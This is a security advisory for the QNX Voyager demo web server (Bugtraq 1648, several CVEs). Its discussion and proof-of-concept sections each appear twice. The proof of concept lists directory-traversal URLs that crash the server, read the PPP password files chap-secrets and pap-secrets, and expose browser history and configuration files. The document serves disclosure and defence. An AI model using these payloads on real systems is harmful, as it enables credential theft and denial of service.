QNX Voyager Webserver Multiple Vulnerabilities
BID:1648
Info
QNX Voyager Webserver Multiple Vulnerabilities
| Bugtraq ID: | 1648 |
| Class: | Design Error |
| CVE: |
CVE-2000-0903 CVE-2000-0904 CVE-2000-0905 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | Discussed in a message posted to BugTraq on Sep. 1, 2000 by [email protected]. |
| Vulnerable: |
QSSL Voyager 2.0 1B |
| Not Vulnerable: | |
Discussion
QNX Voyager Webserver Multiple Vulnerabilities
The web server supplied with the QNX Voyager demo disk contains several vulnerabilities.
First, Voyager will follow relative paths passed to it in requests. This includes ../ style paths, which will allow Voyager to serve pages outside of the "document root".
Another vulnerability is that the web server does not have sufficient security restrictions - this means that the web server can access any file, including protected files and special /dev entries.
As well, due to the integration of the web browser and web server, information used by the Photon GUI is easily exposed by requesting files under /.photon/. Additionally, html files generated by the web browser (error messages, for example) and the QNX configuration interface share the same directory as published html files.
While the Voyager web server is not intended to be used in a production environment, and is in fact intended only to be a demo of the QNX OS, users should be aware of these design errors.
The web server supplied with the QNX Voyager demo disk contains several vulnerabilities.
First, Voyager will follow relative paths passed to it in requests. This includes ../ style paths, which will allow Voyager to serve pages outside of the "document root".
Another vulnerability is that the web server does not have sufficient security restrictions - this means that the web server can access any file, including protected files and special /dev entries.
As well, due to the integration of the web browser and web server, information used by the Photon GUI is easily exposed by requesting files under /.photon/. Additionally, html files generated by the web browser (error messages, for example) and the QNX configuration interface share the same directory as published html files.
While the Voyager web server is not intended to be used in a production environment, and is in fact intended only to be a demo of the QNX OS, users should be aware of these design errors.
Exploit / POC
QNX Voyager Webserver Multiple Vulnerabilities
DoS the web server:
http://target/../../dev/dns
Recent PPP passwords (modem build of Voyager):
http://target/../../etc/ppp/chap-secrets
http://target/../../etc/ppp/pap-secrets
From the BugTraq posting:
[Revealing] URLS include...
http://target/.photon/voyager/config.full
The web client's settings file
http://target/.photon/voyager/history.html
Recently visited sites
http://target/.photon/voyager/hotlist
The list of book-marked sites
http://target/.photon/pwm/pwm.menu
The Photon Window Manager menu listing (Equivalent to MS Windows' 'start
menu')
http://target/.photon/phdial/connection [Modem build only]
Modem set-up information.
http://target/../../etc/config/trap/crt.cur.1
Current screen setting
DoS the web server:
http://target/../../dev/dns
Recent PPP passwords (modem build of Voyager):
http://target/../../etc/ppp/chap-secrets
http://target/../../etc/ppp/pap-secrets
From the BugTraq posting:
[Revealing] URLS include...
http://target/.photon/voyager/config.full
The web client's settings file
http://target/.photon/voyager/history.html
Recently visited sites
http://target/.photon/voyager/hotlist
The list of book-marked sites
http://target/.photon/pwm/pwm.menu
The Photon Window Manager menu listing (Equivalent to MS Windows' 'start
menu')
http://target/.photon/phdial/connection [Modem build only]
Modem set-up information.
http://target/../../etc/config/trap/crt.cur.1
Current screen setting